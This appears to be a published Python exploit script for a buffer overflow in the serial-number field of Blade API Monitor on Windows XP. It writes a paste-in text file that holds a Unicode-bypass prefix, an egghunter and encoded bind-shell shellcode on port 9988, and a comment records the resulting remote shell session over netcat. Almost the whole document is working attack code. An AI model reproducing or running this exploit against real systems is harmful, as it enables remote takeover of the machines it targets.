Blade API Monitor Unicode Bypass Buffer Overflow

`#!/usr/bin/python -w  
#---------------------------------------------------------------------------------#  
# Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF) #  
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com #  
# http://www.fuzzysecurity.com/exploits/8.html #  
# OS: WinXP PRO SP3 #  
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/ #  
# f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe #  
# #  
# Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/ #  
#---------------------------------------------------------------------------------#  
# This is a super strange exploit. First I would like to commend "FullMetalFouad" #  
# for the unicode work on the original exploit. Originally I wanted to see if I #  
# could simplify the process. While I was doing that I lost sight of the fact #  
# that the instructions had to be printable since we need to copy them from a #  
# text file. When I opened my POC I saw that all the characters had been #  
# converted to weird blocks (check my site for a screenshot). On a whim I tried #  
# to paste these characters in the serial number field and amazingly the buffer #  
# in the debugger was intact but with one important difference, the unicode had #  
# been converted back to regular ASCII!! Very strange but super fortunate!! If #  
# you want to experiment with the exploit just keep in mind to (1) open it in #  
# windows notepad and (2) that all the characters need to be converted to those #  
# blocks for it to work (depending on your buffer this isn't always the case). #  
#---------------------------------------------------------------------------------#  
# root@bt:~# nc -nv 192.168.111.128 9988 #  
# (UNKNOWN) [192.168.111.128] 9988 (?) open #  
# Microsoft Windows XP [Version 5.1.2600] #  
# (C) Copyright 1985-2001 Microsoft Corp. #  
# #  
# C:\Program Files\BladeAPIMonitor>ipconfig #  
# ipconfig #  
# #  
# Windows IP Configuration #  
# #  
# #  
# Ethernet adapter Local Area Connection: #  
# #  
# Connection-specific DNS Suffix . : localdomain #  
# IP Address. . . . . . . . . . . . : 192.168.111.128 #  
# Subnet Mask . . . . . . . . . . . : 255.255.255.0 #  
# Default Gateway . . . . . . . . . : #  
# #  
# C:\Program Files\BladeAPIMonitor> #  
#---------------------------------------------------------------------------------#  
filename="PasteMe.txt"  
#---------------------------------------------------------------------------------#  
# Originally unicode instructions to put an address in EAX, here it is used to #  
# trigger notepad bug and get UNICODE => ASCII conversion... #  
#---------------------------------------------------------------------------------#  
UniKill = (  
"\xB8\x06\xAA\x6F\x50"  
"\x6F\x4C\x6F\x58\x6F"  
"\x05\x73\x00\x6F\xB0"  
"\xB9\xD8\xAA\x6F\xE8")  
#Egghunter - Marker b33f  
#Size 32-bytes  
hunter = (  
"\x66\x81\xca\xff"  
"\x0f\x42\x52\x6a"  
"\x02\x58\xcd\x2e"  
"\x3c\x05\x5a\x74"  
"\xef\xb8\x62\x33" #b3  
"\x33\x66\x8b\xfa" #3f  
"\xaf\x75\xea\xaf"  
"\x75\xe7\xff\xe7")  
#msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c  
#Size 742-bytes  
shellcode = (  
"\xd9\xe1\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"  
"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"  
"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"  
"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c"  
"\x48\x68\x4b\x39\x37\x70\x45\x50\x53\x30\x71\x70\x4f\x79\x69"  
"\x75\x34\x71\x79\x42\x53\x54\x4c\x4b\x71\x42\x64\x70\x6c\x4b"  
"\x42\x72\x66\x6c\x6c\x4b\x73\x62\x57\x64\x4e\x6b\x73\x42\x36"  
"\x48\x36\x6f\x4f\x47\x71\x5a\x44\x66\x56\x51\x49\x6f\x75\x61"  
"\x69\x50\x4c\x6c\x45\x6c\x61\x71\x61\x6c\x63\x32\x44\x6c\x47"  
"\x50\x49\x51\x6a\x6f\x56\x6d\x55\x51\x49\x57\x4b\x52\x58\x70"  
"\x62\x72\x76\x37\x4e\x6b\x56\x32\x34\x50\x6c\x4b\x47\x32\x37"  
"\x4c\x73\x31\x5a\x70\x6c\x4b\x61\x50\x62\x58\x4d\x55\x49\x50"  
"\x63\x44\x50\x4a\x36\x61\x5a\x70\x50\x50\x6e\x6b\x33\x78\x74"  
"\x58\x4c\x4b\x63\x68\x57\x50\x45\x51\x4a\x73\x38\x63\x67\x4c"  
"\x42\x69\x4e\x6b\x56\x54\x6c\x4b\x47\x71\x7a\x76\x35\x61\x59"  
"\x6f\x56\x51\x49\x50\x6e\x4c\x6b\x71\x4a\x6f\x46\x6d\x67\x71"  
"\x48\x47\x46\x58\x59\x70\x62\x55\x4a\x54\x56\x63\x43\x4d\x79"  
"\x68\x75\x6b\x73\x4d\x46\x44\x63\x45\x4b\x52\x61\x48\x6e\x6b"  
"\x70\x58\x46\x44\x65\x51\x4b\x63\x32\x46\x4c\x4b\x44\x4c\x50"  
"\x4b\x4c\x4b\x46\x38\x77\x6c\x65\x51\x6b\x63\x4c\x4b\x76\x64"  
"\x6e\x6b\x56\x61\x38\x50\x6e\x69\x32\x64\x76\x44\x44\x64\x71"  
"\x4b\x71\x4b\x75\x31\x73\x69\x72\x7a\x72\x71\x59\x6f\x59\x70"  
"\x76\x38\x63\x6f\x51\x4a\x4c\x4b\x74\x52\x78\x6b\x4e\x66\x71"  
"\x4d\x51\x78\x67\x43\x46\x52\x37\x70\x43\x30\x31\x78\x71\x67"  
"\x51\x63\x35\x62\x71\x4f\x76\x34\x42\x48\x50\x4c\x53\x47\x31"  
"\x36\x54\x47\x69\x6f\x49\x45\x68\x38\x4e\x70\x37\x71\x67\x70"  
"\x35\x50\x37\x59\x7a\x64\x52\x74\x50\x50\x63\x58\x51\x39\x4b"  
"\x30\x30\x6b\x75\x50\x39\x6f\x69\x45\x32\x70\x76\x30\x42\x70"  
"\x66\x30\x73\x70\x62\x70\x31\x50\x42\x70\x43\x58\x49\x7a\x64"  
"\x4f\x4b\x6f\x39\x70\x59\x6f\x5a\x75\x6b\x39\x78\x47\x30\x31"  
"\x49\x4b\x62\x73\x33\x58\x74\x42\x43\x30\x65\x77\x53\x34\x4c"  
"\x49\x4a\x46\x70\x6a\x44\x50\x46\x36\x56\x37\x63\x58\x79\x52"  
"\x39\x4b\x34\x77\x55\x37\x6b\x4f\x38\x55\x62\x73\x76\x37\x53"  
"\x58\x6f\x47\x4b\x59\x37\x48\x6b\x4f\x69\x6f\x58\x55\x72\x73"  
"\x30\x53\x53\x67\x50\x68\x54\x34\x78\x6c\x65\x6b\x6b\x51\x39"  
"\x6f\x6e\x35\x61\x47\x6c\x49\x78\x47\x73\x58\x31\x65\x70\x6e"  
"\x30\x4d\x45\x31\x79\x6f\x49\x45\x43\x58\x50\x63\x70\x6d\x43"  
"\x54\x67\x70\x4d\x59\x39\x73\x76\x37\x53\x67\x32\x77\x56\x51"  
"\x69\x66\x30\x6a\x52\x32\x36\x39\x33\x66\x6a\x42\x6b\x4d\x62"  
"\x46\x6b\x77\x30\x44\x34\x64\x35\x6c\x43\x31\x67\x71\x4c\x4d"  
"\x50\x44\x74\x64\x32\x30\x6f\x36\x75\x50\x53\x74\x70\x54\x32"  
"\x70\x70\x56\x56\x36\x76\x36\x62\x66\x76\x36\x72\x6e\x36\x36"  
"\x52\x76\x71\x43\x30\x56\x73\x58\x64\x39\x7a\x6c\x35\x6f\x6c"  
"\x46\x59\x6f\x6e\x35\x6b\x39\x59\x70\x70\x4e\x51\x46\x47\x36"  
"\x39\x6f\x34\x70\x55\x38\x44\x48\x6c\x47\x37\x6d\x33\x50\x49"  
"\x6f\x4a\x75\x6d\x6b\x5a\x50\x6f\x45\x79\x32\x72\x76\x55\x38"  
"\x4f\x56\x4d\x45\x4f\x4d\x4f\x6d\x6b\x4f\x69\x45\x47\x4c\x67"  
"\x76\x43\x4c\x55\x5a\x6d\x50\x79\x6b\x4d\x30\x51\x65\x33\x35"  
"\x4f\x4b\x62\x67\x37\x63\x31\x62\x62\x4f\x53\x5a\x37\x70\x76"  
"\x33\x49\x6f\x4b\x65\x41\x41")  
#---------------------------------------------------------------------------------#  
# (*) Due to the wierd conversion i couldn't do proper badchar analysis #  
# (1) 0x00425e04 : push esp # ret | startnull,ascii ==> BladeAPIMonitor.exe #  
# (2) egghunter: We do this because we need more space than we have at ESP #  
# (3) alpha mixed Bindshell port 9988 #  
#---------------------------------------------------------------------------------#  
egg = "\x90"*18 + hunter  
evil = "\x90"*10 + "b33f"*2 + shellcode  
buffer = UniKill + "A"*560 + "\x04\x5E\x42\x00" + egg + "B"*500 + evil  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
  
  
`